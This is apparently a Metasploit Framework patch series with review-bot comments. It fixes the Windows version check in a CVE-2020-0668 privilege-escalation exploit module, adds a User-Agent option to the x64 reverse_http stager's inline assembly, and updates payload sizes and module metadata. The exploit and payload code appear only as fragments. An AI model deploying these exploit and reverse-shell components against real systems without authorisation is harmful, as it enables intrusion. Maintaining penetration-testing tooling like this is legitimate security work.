From 686a463a87a1c7e5e3f6f833872dc6365bdac401 Mon Sep 17 00:00:00 2001 From: sjanusz-r7 Date: Thu, 12 Dec 2024 12:57:20 +0000 Subject: [PATCH 1/6] Keep track of RPC token per-thread --- lib/msf/core/rpc/v10/service.rb | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/rpc/v10/service.rb b/lib/msf/core/rpc/v10/service.rb index 90f8c3b3e6d8..81dfbbb99064 100644 --- a/lib/msf/core/rpc/v10/service.rb +++ b/lib/msf/core/rpc/v10/service.rb @@ -140,11 +140,16 @@ def process(req) end end - ::Timeout.timeout(self.dispatcher_timeout) { self.handlers[group].send(mname, *msg) } + ::Timeout.timeout(self.dispatcher_timeout) do + Thread.current[:rpc_token] = token + self.handlers[group].send(mname, *msg) + end rescue ::Exception => e elog('RPC Exception', error: e) process_exception(e) + ensure + Thread.current[:rpc_token] = nil end end From 48ed31f32349443a3a9538fa4f011b085e9d32fa Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Thu, 12 Dec 2024 17:11:53 -0600 Subject: [PATCH 2/6] Fix version check --- .../exploits/windows/local/cve_2020_0668_service_tracing.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb b/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb index 629d097e29fd..a2ab61079da6 100644 --- a/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb +++ b/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb @@ -261,7 +261,6 @@ def exploit # start file copy rastapi_privileged_filecopy(payload_dll, exploit_dir, upload_payload_pathname, target_payload_pathname) - # launch trigger launch_dll_trigger print_warning("Manual cleanup after reboot required for #{target_payload_pathname} and #{exploit_dir}") 
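Review bot: The new `Thread.current[:rpc_token] = token` inside the `Timeout` block carries no comment saying what the key is for or who reads it, and `process`'s body starts before the hunk, so the origin of `token` is not visible here. I'd document the contract above the assignment: `# Expose this request's RPC token to handlers via thread-local storage; cleared in ensure so a reused thread never carries a stale token into the next request.` A thread-local is not inherited by threads a handler may spawn, so any handler doing work on a background thread will see nil there — if that matters, the token has to be passed explicitly rather than read from `Thread.current`. The pre-existing `rescue ::Exception` is left as is by this change; narrowing it to `StandardError` is a separate concern worth a follow-up.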
@@ -285,8 +284,7 @@ def validate_target end version_info = get_version_info - vprint_status("Version: #{version_info.number}") - unless version_info.build_version.between?(Msf::WindowsVersion::Win10_1803, Msf::WindowsVersion::Win10_1909) + unless version_info.build_number.between?(Msf::WindowsVersion::Win10_1803, Msf::WindowsVersion::Win10_1909) fail_with(Failure::NotVulnerable, 'The exploit only supports Windows 10 build versions 17134-18363') end end From 50b12596a635e2dc0d12189baed6441d54db15f0 Mon Sep 17 00:00:00 2001 From: jenkins-metasploit Date: Fri, 13 Dec 2024 19:54:06 +0000 Subject: [PATCH 3/6] automatic module_metadata_base.json update --- db/modules_metadata_base.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json index 8b95aae87260..19d621d22692 100644 --- a/db/modules_metadata_base.json +++ b/db/modules_metadata_base.json @@ -177848,7 +177848,7 @@ "targets": [ "Windows x64" ], - "mod_time": "2023-05-25 12:45:30 +0000", + "mod_time": "2024-12-12 17:11:53 +0000", "path": "/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb", "is_install_path": true, "ref_name": "windows/local/cve_2020_0668_service_tracing", From 8af31e6b01704cd5c687ed6ad7fd27bb5a483815 Mon Sep 17 00:00:00 2001 From: pczinser Date: Sat, 14 Dec 2024 15:39:16 -0500 Subject: [PATCH 4/6] updated the inline asm to use User Agent --- .../payload/windows/x64/reverse_http_x64.rb | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/payload/windows/x64/reverse_http_x64.rb b/lib/msf/core/payload/windows/x64/reverse_http_x64.rb index 21e87d26efef..d6ddf74b7cb6 100644 --- a/lib/msf/core/payload/windows/x64/reverse_http_x64.rb +++ b/lib/msf/core/payload/windows/x64/reverse_http_x64.rb @@ -62,7 +62,7 @@ def generate(opts={}) # Otherwise default to small URIs conf[:url] = luri + generate_small_uri end - + generate_reverse_http(conf) end 
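Review bot: Dropping the `vprint_status` line removes the only place the detected build was printed, so a `NotVulnerable` failure no longer shows which build the check rejected; I'd keep a verbose line using the accessor the new check relies on, `vprint_status("Build number: #{version_info.build_number}")`, just before the `unless`. The 17134-18363 range in the failure message matches `Win10_1803`..`Win10_1909`, so the message stays consistent with the corrected comparison. `validate_target` begins outside the hunk.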
@@ -168,6 +168,7 @@ def asm_generate_ascii_array(str) # @option opts [String] :url The URI to request during staging # @option opts [String] :host The host to connect to # @option opts [Integer] :port The port to connect to + # @option opts [String] :ua The User Agent the payload will use # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh # @option opts [String] :proxy_host The optional proxy server host to use # @option opts [Integer] :proxy_port The optional proxy server port to use @@ -245,9 +246,21 @@ def asm_reverse_http(opts={}) internetopen: push rbx ; stack alignment push rbx ; NULL pointer - mov rcx, rsp ; lpszAgent ("") ^ + if opts[:ua] + asm << %Q^ + call load_useragent + db"#{opts[:ua]}", 0x00 + load_useragent: + pop rcx ; lpszAgent (stack pointer) + ^ + else + asm << %Q^ + mov rcx, rsp ; lpszAgent("") + ^ + end + if proxy_enabled asm << %Q^ push 3 From b33b01e0d840b17e7347084651a7a2055c2c1f2e Mon Sep 17 00:00:00 2001 From: Christophe De La Fuente Date: Mon, 16 Dec 2024 12:48:57 +0100 Subject: [PATCH 5/6] Update the CachedSize for `reverse_http` and `reverse_http` payloads --- modules/payloads/stagers/windows/x64/reverse_http.rb | 2 +- modules/payloads/stagers/windows/x64/reverse_https.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/payloads/stagers/windows/x64/reverse_http.rb b/modules/payloads/stagers/windows/x64/reverse_http.rb index 9bf4d4e30c75..36713ffeb8c4 100644 --- a/modules/payloads/stagers/windows/x64/reverse_http.rb +++ b/modules/payloads/stagers/windows/x64/reverse_http.rb @@ -5,7 +5,7 @@ module MetasploitModule - CachedSize = 528 + CachedSize = 610 include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/x64/reverse_https.rb b/modules/payloads/stagers/windows/x64/reverse_https.rb index bfbce09497aa..f83bfc7e39d2 100644 --- a/modules/payloads/stagers/windows/x64/reverse_https.rb 
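Review bot: `db"#{opts[:ua]}", 0x00` interpolates the User-Agent verbatim into assembler source, so a value containing a double quote or a newline would terminate the `db` string early and either fail assembly or alter the emitted stager; it is the one place in this hunk where an option value reaches the assembler unescaped. I'd reject such values before building the source, e.g. `raise ArgumentError, 'User agent contains characters that cannot be embedded' if opts[:ua].match?(/["\r\n]/)` at the top of the `if opts[:ua]` branch, or emit the bytes through the file's existing `asm_generate_ascii_array` helper if its output suits a `db` line (its body is not visible here). `db"` also has no space after the mnemonic; if the assembler tolerates it, `db "..."` still reads better. A short comment on the `call load_useragent` / `pop rcx` pair would help too: `# call/pop: the string bytes follow the call, so the popped return address is lpszAgent`. `asm_reverse_http` starts and ends outside this hunk.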
+++ b/modules/payloads/stagers/windows/x64/reverse_https.rb @@ -5,7 +5,7 @@ module MetasploitModule - CachedSize = 562 + CachedSize = 644 include Msf::Payload::Stager include Msf::Payload::Windows From 88347ad2d47c17a9d6173518b4d7c66461c3c257 Mon Sep 17 00:00:00 2001 From: jenkins-metasploit Date: Mon, 16 Dec 2024 12:13:37 +0000 Subject: [PATCH 6/6] automatic module_metadata_base.json update --- db/modules_metadata_base.json | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json index 19d621d22692..5526ce4c4fdd 100644 --- a/db/modules_metadata_base.json +++ b/db/modules_metadata_base.json @@ -253471,7 +253471,7 @@ "autofilter_ports": null, "autofilter_services": null, "targets": null, - "mod_time": "2020-09-22 02:56:51 +0000", + "mod_time": "2024-12-16 12:48:57 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb", "is_install_path": true, "ref_name": "windows/x64/custom/reverse_http", @@ -253512,7 +253512,7 @@ "autofilter_ports": null, "autofilter_services": null, "targets": null, - "mod_time": "2020-09-22 02:56:51 +0000", + "mod_time": "2024-12-16 12:48:57 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb", "is_install_path": true, "ref_name": "windows/x64/custom/reverse_https", @@ -254229,7 +254229,7 @@ "autofilter_ports": null, "autofilter_services": null, "targets": null, - "mod_time": "2020-09-22 02:56:51 +0000", + "mod_time": "2024-12-16 12:48:57 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb", "is_install_path": true, "ref_name": "windows/x64/meterpreter/reverse_http", @@ -254273,7 +254273,7 @@ "autofilter_ports": null, "autofilter_services": null, "targets": null, - "mod_time": "2020-09-22 02:56:51 +0000", + "mod_time": "2024-12-16 12:48:57 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb", "is_install_path": true, "ref_name": "windows/x64/meterpreter/reverse_https", 
@@ -256015,7 +256015,7 @@ "autofilter_ports": null, "autofilter_services": null, "targets": null, - "mod_time": "2020-09-22 02:56:51 +0000", + "mod_time": "2024-12-16 12:48:57 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb", "is_install_path": true, "ref_name": "windows/x64/vncinject/reverse_http", @@ -256057,7 +256057,7 @@ "autofilter_ports": null, "autofilter_services": null, "targets": null, - "mod_time": "2020-09-22 02:56:51 +0000", + "mod_time": "2024-12-16 12:48:57 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb", "is_install_path": true, "ref_name": "windows/x64/vncinject/reverse_https",